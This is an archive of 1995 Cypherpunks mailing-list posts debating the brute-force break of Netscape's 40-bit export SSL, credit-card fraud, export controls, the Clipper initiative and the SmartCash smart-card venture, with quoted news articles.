by Assistant Attorney General Jo Ann Harris also snipped>

>By exactly what mechanism are appointed (hired ?) officials such
>as AAG Harris supposedly accountable to the public ?  

Supposedly, the congressional pur$e-$trings...
[I doubt the "reformers" will exercise this power.]

>Can they be brought up on perjury charges ?  

[I *wish* but...] doubtful, our best hope is the media.

>Just what real legal recourse do we have against lying
>scum in the bureaucracy ?

I have mass-forwarded Dave Banisar's post to all the media
e-mail addresses I have. I suggest that everyone on the list
do this too. [Isn't e-mail wonderful?  :) ] I also e-mailed
the government asking which position was the lie, but I don't
expect a response.

>Are we stuck unless we can get some Congresscritter to cry
>foul on the floor of the House or Senate ?

Yup. I'm afraid our best hope [aside from the media]
is Congressman Trafficant and his ilk.  ;-)

<snip>

>"you said too much; and what you said, it was a lie" -EMF

When combined with PRZ's award today, I feel this obvious
lie could be a blessing in disguise for us privacy lovers.
I say this in view of the timing of the upcoming political 
season, but everyone here already knows that I only trust
one kind of candidate to tell us the truth.
Now they know why...
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKYp21lp8bpvW01AQFVggP+PqD6KaxwTYLogOaPC4G7nEzqfnR7sfyc
SXQx4rQFt+HoaDbo89k75jh8BcfCwmZNEXsmbIz7ilyiIcnwhLDLL+sL+ZPie25W
autacym9+MXjrkQUu12qNxQ+XKH0y+TR/mMCGIUVxtpyT5QMPVtAptS1DScoJx0U
0LmFsuSM+Z8=
=C1JX
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 18:42:35 PDT
To: jbuck@Synopsys.COM
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170140.VAA40390@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Joe Buck writes:

<snip>

>Your credit card number, expiration date, etc, are continually being
>revealed to minimum-wage clerks all the time, unless you never use the
>card.  A chain is only as strong as its weakest link; it makes no sense to
>buy an expensive lock when your door has a big enough opening to climb
>through.  Should some bad person get hold of your card number and misuse
>it, you're not out any money: 

I'm not so sure....Checked the fees/interest lately?
"There ain't no such thing as a free credit card theft."
[Apologies to Milton & Rose Friedman.] ;)

>you just tell the card company "I didn't buy
>that".  Since there's so much tracing in the system, if you buy a physical
>something with a stolen credit card number it can usually be traced to you
>(who'd they ship the package to?).  

They only *sometimes* find the person/loot.

>It's not clear to me that *any*
>encryption is really essential if the only purpose is to protect credit
>card #'s from snoopers.

OK, but I had an idea a number of years ago. It's not too new,
either, and considering the BILLION$ in credit-card fraud, I think
the credit card companies could implement it with little trouble at
every site the cards are used. Why not PIN numbers. Banks and their
customers are already used to them, they could be entered over the
phone (I know, not too secure) or in person, and considering the
dollar ammount of the current fraud, they would be cheap (I think).
[There is probably a flaw in my idea, but I haven't found it.]

<snip>

>Q: Of the 20,000 credit card #'s stolen from Netcom's computer, how many
>were used to buy things?  Answer: not sure, but expect the answer is "zero".

Probably so, but imagine being a Netcom customer 
(or a Netcom stockholder).
Not all of the costs of crime are monetary.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKdH21lp8bpvW01AQGBTwP/VQ7BNPAAna6ba3avp+y9us0E5hhpUGdJ
6shHmZjPDWrSZz9aGzq5xhkQzSKdlLy/lFePt8acFBbDaGnK8wzAvoo1S69mr4bA
AUJ+IsI5j/Ctvic0RGbiIlfy+thXna6iwTgDovBB7u311+UMCgMg0A89onIjWCQQ
jKN2sSimEHg=
=0TzV
-----END PGP SIGNATURE-----
Regards, Jim Ray

Don't investigate Mena, Arkansas and contra-coke. 
Embarrassment is a threat to national security...
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 16 Aug 95 21:51:45 PDT
To: cypherpunks@toad.com
Subject: ELINT easier than HUMINT
Message-ID: <ac58168f0b02100478b5@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


(I've deleted the other list that was cc:ed here....)

At 4:03 AM 8/17/95, Chuck McManis wrote:

>This is the problem of using "physical" world analogies with the network.
>A similar argument that is posited is that "Sure its not 100% secure but
>its better than the carbons from a receipt (now gone) or people who
>don't shred their garbage." I respond that the network isn't the "real"
>world so the laws of physics don't apply. Someone in Boston MA is unlikely
>to fly into Sunnyvale to paw through my garbage, but it would be "trivial"
>for them to see my receipt go flashing by can throw some spare compute
>cycles at breaking it. A snooper/cracker program on a "spare" machine
>might yield a half dozen credit cards a week.

I agree. This has direct parallels to "physical eavesdropping" vs.
"electronic eavesdropping." After all, one might argue, why bother with
encrypting phone conversations when a physical bug could pick up the audio?


As Whit Diffie has noted, the difference is one of ease of use. It is hard
to plant physical bugs...and expensive, prone to error, etc. It would also
be pretty obvious, eventually, if every office in a building were
physically bugged, but it would be almost undetectable if the Northern
Telecom PBX box in the basement was being tapped on the way out. Crypto
with back doors is even easier for the wiretapper.

Electronic surveillance and related technologies (packet sniffers are a
form of surveillance) are cheap by comparison to physical surveillance. And
the concentration of communication lines and systems makes ELINT and COMINT
much cheaper _per target_ than HUMINT.

Now I don't personally worry too much at this time about giving my VISA
number over the phone, or even over the Net...I can always deny making an
authorization and the CC companies will not charge me (assuming the goods
ordered were not also shipped to my address).

But the future lies with protecting electronic transactions against
surveillance. The breaking of SSL in Netscape is not terribly important in
and of itself, given the government-imposed limits on key size, and given
the sorts of things now being encrypted (like VISA numbers). It gets more
important as the types of things encrypted become more serious.

At least now we know how people were "vanished" in that recent movie.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Crocker <dcrocker@brandenburg.com>
Date: Wed, 16 Aug 95 22:18:01 PDT
To: Jason Weisberger <jweis@primenet.com>
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <v03002b05ac587f94b403@[204.118.88.53]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:32 AM 8/16/95, Jason Weisberger wrote:
>like using a "security envelope" to mail cash or putting the club on your
>car.  It presents just enough of an obstacle to keep honest people honest.

        As the Mitnick experience shows, the vulnerability of the
providers' host systems is a concern not addressed by link-oriented schemes
such as SSL.  Longer keys for SSL would not have improved the protection on
the 30,000 credit card numbers he stole.

d/

--------------------
Dave Crocker                                                +1 408 246 8253
Brandenburg Consulting                                fax:  +1 408 249 6205
675 Spruce Dr.                                       page:  +1 408 581 1174
Sunnyvale, CA  94086 USA                           dcrocker@brandenburg.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 16 Aug 95 20:38:10 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Randal Schwartz Petition
Message-ID: <Pine.ULT.3.91.950816223529.1576A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I hate to do this, but for any of you that have been following the Randall
Schwartz (or Perl fame) fiasco, there is now a URL with information about
collecting petition signatures and letters of support for the sentencing
judge. 

The URL is found at http://www.ugcs.caltech.edu/~kluster/petition.html/

Personally, I think it's rediculous all the crap that went into this 
conviction, but that's just my personal opinion.  This probably isn't the 
correct place to discuss it, but misc.legal.computing has taken it up.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMDKdnDokqlyVGmCFAQGUNgP+NgqXU3p7Pb0vXYMb9gBiqDzGcIYeXdLG
KfhmbTG0mOaVvcWzrrD7oEkdTXiPUhtzOknWH4C6OalSV54JwYGVEueOPfpeztBG
2u0izzyTX1UB2cCb352PxstpwSkrFoQHUqVCDRpHZcSNcTwfrS3vmYK5fLE5VY6n
203SEqfYupA=
=Q4x2
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++) ULU++ P+ L++ E---- W+(-) N++++ o+ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G+++++ e++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Wed, 16 Aug 95 20:14:26 PDT
To: Joe Buck <jbuck@Synopsys.COM>
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170312.XAA45301@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Joe Buck <jbuck@Synopsys.COM> wrote:

<snip>

>Yes, it's true that {fraud} contributes to high interest rates (though
>defaults cost more than fraud).

Sometimes there's little difference.

<snip>

>> They only *sometimes* find the person/loot.
>
>Doesn't matter, this is a disincentive to theft and you are never liable
>unless you lost your physical card.

I was referring to my previous point, whether or not you're
*individually* liable, "somebody" always pays.

<snip>

>It would cost billions to get every single merchant that accepts credit
>cards set up with PIN equipment.

Agreed. Fraud/defaults cost billions too, the billions I propose
spending would be a one-time, rather than yearly, cost.

>
>> Why not PIN numbers.

<snip>

>
>You have to make sure the clerk that gets your order doesn't see the
>PIN (so you need a secure path between you and your credit card co.
>that avoids the merchant).

I was thinking of some piece of hardware the clerk could hand you,
but "shoulder surfing," by the clerk or by other customers, will
always be possible, just as with ATMs or phonecards.
My idea isn't perfect, just better than the present reality, IMO.

>And what about the tellers?  Do you know
>how badly they are treated?  They can get all those #'s.  Yes, it
>can be done: ATMs are set up that way.  But as long as it's not done,
>those who scream at the horrors of sending credit card #'s over the
>net aren't thinking clearly.
>
>Never forget that social engineering is the easiest hack.  Technical
>solutions that ignore wide-open social engineering paths are worse
>than useless (worse because they give an illusion of security).

Agreed. My idea *is* imperfect. Social engineering works well.
I just don't want to let the great be the enemy of the good,
and the credit card fraud situation now is intolerable.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMDKxtm1lp8bpvW01AQFiCQQArDkX2OS/9FitoMYfKHa2K5O9UsAw+Yv9
yVrp1T8NtvieQkVMEpAbhAq3ISEcam2WsVOAOUPT7goK4yyzSz2UURaDsAru8kRO
66A9p0QSmS7sciNV4N2tGz/KlM44wV8axNs/9R9AAktnHhD/YbhtF0ONXTUXzrDi
FwTSwgVD71o=
=a9+Y
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The important thing is not to stop questioning. Curiosity has its
own reason for existing. One cannot help but be in awe when he
contemplates the mysteries of eternity, of life, of the marvelous
structures of reality. It is enough if one merely tries to comprehend
a little of this mystery every day. Never lose a holy curiosity."
 -- Albert Einstein
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: goedel@tezcat.com (Dietrich J. Kappe)
Date: Wed, 16 Aug 95 22:28:32 PDT
To: cypherpunks@toad.com
Subject: SSL Challenge - Some thoughts
Message-ID: <v01510103ac588f7b2979@[204.248.80.18]>
MIME-Version: 1.0
Content-Type: text/plain


1. What kind of pseudo random number generator does Netscape use?

2. If it is a cryptographically secure sequence, doesn't that run up
against ITAR restrictions?

3. Can we improve upon the brute force algorithm in a non-probabilistic way?

4. If we are happy with a 5% yield, we can restrict ourselves to the same
5% of the key space for each message.

DJK






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 16 Aug 95 22:57:09 PDT
To: rah@shipwright.com
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <v02120d01ac57cb36e14b@[199.0.65.105]>
Message-ID: <9508170554.AA17364@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain



>From: rah@shipwright.com (Robert Hettinga)

>I can see the headlines now: "Netscape Security Broken, Stock Falls".

Bob,

So can I... :-(

Too bad Damien didn't wait until after the date one could legally
short the stock.  That would have been the perfect time for a media
frenzy on the issue.  The announcement of SSL having been broken is
occuring too soon to be at all useful in the financial sense.  The
media frenzy, if it happens, will now occur well before the 30-day
lock-out on shorting a new issue.  What a shame. <arg>!

Loren




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 17 Aug 95 02:49:05 PDT
To: "Harry S. Hawk" <habs@warwick.com>
Subject: Re: SSL challenge -- broken !
Message-ID: <199508170946.CAA26868@ix5.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:39 PM 8/16/95 -0500, you wrote:
>> I haven't seen any news stories about this on the wire
>> services. Someone would have to write a story about it first before
>> people would know...
>
>I've suggested this to a few reporters I know..

It's worth suggesting this _carefully_ so the spin's right.
For instance "Oh, no, Netscape lets Hackers suck all the money
out of your credit cards" would be bad :-)  On the other hand,
"The US Government's Evil Plans to block encryption are limiting
Netscape's export products to an encryption system already broken
by a French university.  This means you can send credit card numbers
safely to American web sites, but not to foreign ones - like the
airline or hotel reservations you were making for your vacation,
or those Irish handcrafts or bottle of Scotch you were ordering,
or that Hong Kong magazine you were subscribing to, or the CD from
that band in Budapest that had the great sound samples out there.
And when you were donating to that Amazon rainforest conservation
group, the NSA's arbitrary export rules may have just helped the
Colombian drug cartels rip off your credit card."
#---
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

	   "The fat man rocks out
	Hinges fall off Heaven's door
	   "Come on in," says Bill"    Wavy Gravy's haiku for Jerry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Thu, 17 Aug 95 01:25:20 PDT
To: cypherpunks@toad.com
Subject: SmartCash
Message-ID: <199508170825.DAA16917@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain




Alliance formed to develop first nationwide smart card
company


New York, Aug. 16 (Reuters) - The United States is a step 
closer to cashless commerce.

Fourteen banks and financial instutions said Wednesday
that they will form a company to develop and issue the
first debit card that can be used nationwide instead of
cash for purchases under $20.

The new company, to be called SmartCash, will help speed
the implementation of so-called "smart card" technology
that uses a micro-processor chip embedded in the card to
store vast amounts of information, including improved
security features.

"The chip gives the card an amazing abitity to contain
stored information," said Nancy Elder, a spokeswoman for
MasterCard International Inc., one of the companies
participating in the creation of SmartCash.

In addition to Mastercard International, other founding
companies include Banc One Corp., Bank of America,
Chemical Bank Corp., CoreStates Financial Corp.,
NationsBank Corp. and Wachovia Corp. However,
participation in SmartCash will be open to all U.S.
financial institutions and card providers, the companies
said.

"SmartCash represents a shared vision and a shared
commitment to deliver the increased convenience,
flexibility and efficiency of electronic cash to U.S.
consumers, merchants and banks," said Hatim Tyabji,
chairman of VeriFone Inc., a pioneer in stored value
technology and another founder of SmartCash.

The SmartCash card also will be standardised with similar
efforts already underway for smart cards developed by
credit card companies Europay, MasterCard and Visa.

"Standardized specifications are all woven into the
process. If you use your card in New York, it will be the
same as if you use it on the West Coast," Elder said.

The stored value application, one of the many uses of the
card's embedded chip, enables funds from the cardholder's
bank or credit-card account to be loaded into the card
from an automated teller machine or from one of the
terminals now under developement specifically for the
SmartCash card.

Elder said the companies have not identified what the
cost to the consumer would be, but noted, "the consumer
is going to have to see the value in it for them to want
to use it."

She also said there was a potential for the card to be
expanded for use by those without bank accounts, who
could credit the card in person at various locations.

Elder added that the demand for such a versatile card was
the driving force behind the broad alliance of companies
already signed on to the SmartCash plan.

"Sixty percent of consumers surveyed in the U.S. said
they would be willing to switch banks to get the use of
stored value (cards)," Elder said.

Amy Brinkley, executive vice president at NationsBank,
said the venture showed "unprecedented industry
cooperation to develop an innovative financial product."

SmartCash will combine assets and staff of the founding
companies and pursue technology being developed by
MasterCard, VeriFone, Electronic Payment Services Inc.,
and privately held Gemplus.

A pilot programme is already under development in
Delaware that will be overseen by Wilmington Trust and
Electronic Payment and other regional pilot programmes
were likely to spring up around the country next year,
Elder said.

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Thu, 17 Aug 95 00:53:42 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <9508170022.AA19096@cs.umass.edu>
Message-ID: <Pine.D-G.3.91.950817035141.3096A-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 16 Aug 1995, Futplex wrote:

> Dave Banisar quotes FBI documents obtained via the FOIA:
> >      Technical solutions, such as they are, will only work if 
> >      they are incorporated into *all* encryption products.  
> >      To ensure that this occurs, legislation mandating the 
> >      use of Government-approved encryption products or 
> >      adherence to Government encryption criteria is required.
> 
> ...meanwhile...
> > Testifying before a Senate Judiciary 
> > Subcommittee on May 3, 1994, Assistant Attorney General Jo Ann 
> > Harris asserted that:
> > 
> >      As the Administration has made clear on a number of 
> >      occasions, the key-escrow encryption initiative is a 
> >      voluntary one; we have absolutely no intention of 
> >      mandating private use of a particular kind of 
> >      cryptography, nor of criminalizing the private use of 
> >      certain kinds of cryptography.
>        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 
> By exactly what mechanism are appointed (hired ?) officials such as AAG Harris
> supposedly accountable to the public ?  Can they be brought up on perjury
> charges ?  Just what real legal recourse do we have against lying scum in the
> bureaucracy ?  Are we stuck unless we can get some Congresscritter to cry
> foul on the floor of the House or Senate ?

You sure are anxious to prosecute government officials.  What is untrue 
about her statement.  Maybe she meant it's OK to use ROT-13 but nothing 
else ...

And you guys complained about the Jake Baker prosecution!

BTW, Harris is no longer AAG-Criminal Division.  She went back to 
teaching, keeping a commitment she made to her family.  And yes, she was 
appointed by the President and confirmed by the Senate.


 
> -Futplex <futplex@pseudonym.com>
> "you said too much; and what you said, it was a lie" -EMF
> 

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 17 Aug 95 03:40:34 PDT
To: cypherpunks@toad.com
Subject: Re: SmartCash (NewsClip)
Message-ID: <199508171040.GAA15464@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



>She also said there was a potential for the card to be
>expanded for use by those without bank accounts, who
>could credit the card in person at various locations.

Or even those who don't exist.  Sounds like real cash to me.  Note that 20%
of the population have no bank accounts.

DCF

"Coercion-based systems only work if the person coerced is immobile, stupid,
or weak."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 16 Aug 95 22:14:16 PDT
To: cypherpunks@toad.com
Subject: SmartCash (NewsClip)
Message-ID: <199508170514.HAA29043@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Alliance formed to develop first nationwide smart card
company


New York, Aug. 16 (Reuters) - The United States is a step 
closer to cashless commerce.

Fourteen banks and financial instutions said Wednesday
that they will form a company to develop and issue the
first debit card that can be used nationwide instead of
cash for purchases under $20.

The new company, to be called SmartCash, will help speed
the implementation of so-called "smart card" technology
that uses a micro-processor chip embedded in the card to
store vast amounts of information, including improved
security features.

"The chip gives the card an amazing abitity to contain
stored information," said Nancy Elder, a spokeswoman for
MasterCard International Inc., one of the companies
participating in the creation of SmartCash.

In addition to Mastercard International, other founding
companies include Banc One Corp., Bank of America,
Chemical Bank Corp., CoreStates Financial Corp.,
NationsBank Corp. and Wachovia Corp. However,
participation in SmartCash will be open to all U.S.
financial institutions and card providers, the companies
said.

"SmartCash represents a shared vision and a shared
commitment to deliver the increased convenience,
flexibility and efficiency of electronic cash to U.S.
consumers, merchants and banks," said Hatim Tyabji,
chairman of VeriFone Inc., a pioneer in stored value
technology and another founder of SmartCash.

The SmartCash card also will be standardised with similar
efforts already underway for smart cards developed by
credit card companies Europay, MasterCard and Visa.

"Standardized specifications are all woven into the
process. If you use your card in New York, it will be the
same as if you use it on the West Coast," Elder said.

The stored value application, one of the many uses of the
card's embedded chip, enables funds from the cardholder's
bank or credit-card account to be loaded into the card
from an automated teller machine or from one of the
terminals now under developement specifically for the
SmartCash card.

Elder said the companies have not identified what the
cost to the consumer would be, but noted, "the consumer
is going to have to see the value in it for them to want
to use it."

She also said there was a potential for the card to be
expanded for use by those without bank accounts, who
could credit the card in person at various locations.

Elder added that the demand for such a versatile card was
the driving force behind the broad alliance of companies
already signed on to the SmartCash plan.

"Sixty percent of consumers surveyed in the U.S. said
they would be willing to switch banks to get the use of
stored value (cards)," Elder said.

Amy Brinkley, executive vice president at NationsBank,
said the venture showed "unprecedented industry
cooperation to develop an innovative financial product."

SmartCash will combine assets and staff of the founding
companies and pursue technology being developed by
MasterCard, VeriFone, Electronic Payment Services Inc.,
and privately held Gemplus.

A pilot programme is already under development in
Delaware that will be overseen by Wilmington Trust and
Electronic Payment and other regional pilot programmes
were likely to spring up around the country next year,
Elder said.

-----









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 17 Aug 95 05:07:50 PDT
To: cypherpunks@toad.com
Subject: WSJ on SSL Crack
Message-ID: <199508171207.IAA15512@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Wall Street Journal, August 17, 1995, p. B3.


   French Hacker Cracks Netscape Code, Shrugging Off U.S.
   Encryption Scheme

   By Jared Sandberg


   A computer hacker in France has breached the encryption
   scheme of new Netscape software for navigating the
   Internet, the global computer network. The breach
   underscores flaws in U.S. rules restricting the export of
   more-sophisticated security measures.

   The hacker, a French student at the Ecole Polytechnique,
   cracked the weaker encryption scheme that U.S. government
   policy forces Netscape Communications Corp. to use in a
   foreign version of its Navigator software. Yesterday, he
   posted the results of his efforts on the Internet's
   Cypherpunks discussion group.

   The student took up a challenge issued on July 14 in the
   Cypherpunks group, which is frequented by cryptography
   experts and hackers and mathematicians. He used 120
   powerful computer workstations and two supercomputers to
   crack a piece of information encrypted in Netscape's
   "browser" software. The security is aimed at scrambling
   sensitive financial data to keep credit-card numbers, sales
   transactions and other material safe from breakms.

   The highly sophisticated computers took eight days to break
   the code -- far more power and time than the typical
   illegal hacker would be able to muster for criminal
   pursuits. But the chore nonetheless highlights the
   vulnerabilities that could make customers shy away from
   conducting commerce on the Internet, particularly
   international users who can't get hold of the tougher
   security measures allowed within the U.S.

   The French hacker was able to crack the so-called 40-bit
   encryption scheme in Netscape's overseas version of its
   software. In the U.S., Netscape employs a far more powerful
   design -- 128 bits, a number that refers to length of the
   encoding "key," which is used to scramble data.

   U.S. rules limit Netscape to exporting only 40-bit
   encryption overseas. Yet the 128-bit version takes
   exponentially more power to crack: Compared with violating
   the 40-bit scheme, the 128-bit key would take
   10-to-the-26th-power more time to breach, experts say.
   That's a 1 followed by 26 zeroes, a factor of time that
   makes it all but impossible for hackers to break in.

   Netscape wasn't surprised at the findings. The company said
   it has always known and stated that 40-bit security could
   be breached by "brute force," the use of massive computing
   power to descramble the information.

   "This is a good indication of why the government should
   allow us to ship more secure software," said Mike Homer,
   Netscape's vice president of marketing. "The laws are
   archaic."

   Clinton administration officials have viewed strong
   encryption as a weapon for foreign terrorists, who could
   exchange communications without fear of eavesdropping by
   law enforcement officials.

   That policy, however, has raised the hackles of industry
   executives, who say that without strong encryption abroad,
   the growth of electronic commerce could be significantly
   stunted. Last week, a group of software executives told the
   White House that restrictive export regulations might blunt
   American competitiveness in foreign markets.

   "Netscape security is fine," said Dietrich Cappe, a senior
   partner at Red Planet LLC, an Internet consulting company.
   "As long as the government's export restriction exists,
   commerce is going to be severely hampered." Netscape
   licenses the encryption algorithm from RSA Data Security
   Inc., one of the most prominent software security firms
   that licenses its software to most major software
   companies. "We've warned the government that the level of
   security they allow our customers to export is too weak,"
   said James Bidzos, president of RSA. "Maybe they'll listen
   now."

   Netscape's Mr. Homer noted, however, that the amount of
   effort and computing power, which could cost as much as
   $10,000 in addition to the cost of the machines, don't make
   even breaches of 40-bit security practical from a thief's
   perspective.

   "You'd be better off working in a shoe store, stealing
   credit card numbers for a week." Mr. Homer said.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 17 Aug 95 05:33:52 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: SSL challenge -- broken !
Message-ID: <199508171232.IAA02057@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



It has occured to me that, because the RC4 key crackers spend most of
their time in key setup, you can crack N SSL sessions that you
captured in not substantially more time than it took to crack 1. This
is analagous to the way brute force Unix password file hacking operates.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Thu, 17 Aug 95 08:39:23 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161832.OAA19556@frankenstein.piermont.com>
Message-ID: <199508171539.IAA02929@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> > > Hal <hfinney@shell.portal.com> writes:
> > > I am a little alarmed by the suggestion that this news could have some
> > > marked impact on the Netscape stock price.  From our perspective this was

> Jim Gillogly writes:
> > So far it appears not to have had an effect.  The two web pages I know abou

> "Perry E. Metzger" <perry@piermont.com> writes:
> I haven't seen any news stories about this on the wire
> services. Someone would have to write a story about it first before
> people would know...

I note that Netscape is down 3 at the moment... cause and effect are hard
to identify, of course, since the stock has been waving around a lot since
its IPO a week ago.  In any case, provisional full marks to Perry.

	Jim Gillogly
	Highday, 25 Wedmath S.R. 1995, 15:38




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 17 Aug 95 09:14:29 PDT
To: cypherpunks@toad.com
Subject: Re: Out of state gambling
Message-ID: <ac58b316100210043f2c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 8/17/95, Anonymous wrote:
>Hello C-Punks:
>
>(nb This is posted anonymously because I had this idea the implementation
>of which would be (probably) illegal.  I'm not sure whether putting my

It's being done. Many of us have talked about the implications of this.
Writing about it is not against the law in the U.S., at this time. A little
matter of the First Amendment,  don't you know.

See for example the Cypherpunks Web site archives,
http://www.hks.net/cpunks/index.html, or grep/search for "gambling" in my
Cyphernomicon FAQ (in my ftp directory at Netcom: ftp.netcom.com,
/pub/tc/tcmay/CP-FAQ, and in a couple of Web sites, including
http://www.swiss.ai.mit.edu/6095/articles/cyphernomicon/CP-FAQ).

My point? Not a bad idea, but also not one you should have any fear of
discussing publically (unless you believe certain conspiracy theories!).

I've been talking and writing about the implications of this stuff since
late 1987, and have not yet been "disappeared." I don't happen to like a
lot of what's going on in Washington, but I doubt that Louis Freeh or
Dorothy Denning are going to silence or threaten me!


>name to the idea would be a good idea for the reason that I can't be
>sure that I wouldn't be implicated under the overbroad "conspiracy" or
>"Rico" powers which are oh so popular as a way of putting people away
>for thought crimes.  This message will in any case have appeared via

I'm not a fan of RICO either, but we need to be careful not to impute to
RICO things which just don't happen. So far as I know, no "thought crimes"
have been prosecuted under RICO. Prosecutors--and I am not one, but I watch
them all day on t.v.!--have certain procedures they have to follow. They
just don't have the time, budget, and mandate to try to prosecute writers
and speakers, especially when the words and speech are clearly protected
under the First Amendment.

The _potential_ prosecution of Phil Zimmermann--and I say "potential"
because at the time I'm writing this, no indictment has been made--is not
because Phil was writing inflammatory stuff, but is related to the
circumstances surrounding the appearance of PGP 1.0 in foreign countries.
These would be ITAR issues, not "thoughtcrime." Or at least this is what
most people believe is the issue, as the Grand Jury has not said anything
publically.

(By the way, I'm not being critical of Anonymous here. I, too, have used
the term "thoughtcrime," as shorthand for what I think are the implications
of certain trends in the U.S. and elsewhere. Criminalizing "hate speech"
fits the Orwellian definition, in my opinion. But we all have to be careful
not to use this metaphor too broadly.)


>a couple of foreign remailers on it's way. I am proud of the idea, but
>I appreciate those of you who know who I am keeping quiet about it, as
